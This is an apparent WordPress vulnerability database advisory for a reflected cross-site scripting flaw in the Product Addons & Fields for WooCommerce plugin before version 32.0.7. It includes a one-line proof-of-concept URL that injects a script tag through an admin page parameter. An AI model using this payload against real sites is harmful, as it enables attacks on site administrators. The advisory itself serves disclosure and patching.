WordPress Plugin Vulnerabilities
Product Addons & Fields for WooCommerce < 32.0.7 - Reflected Cross-Site Scripting
Description
The plugin does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.
Proof of Concept
Ensure WooCommerce is installed. Visit the following path, while logged in as an Admin: /wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&"><script>alert(/XSS/)</script>=1
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-05-01 (about 1 years ago)
Added
2023-05-03 (about 1 years ago)
Last Updated
2023-05-04 (about 1 years ago)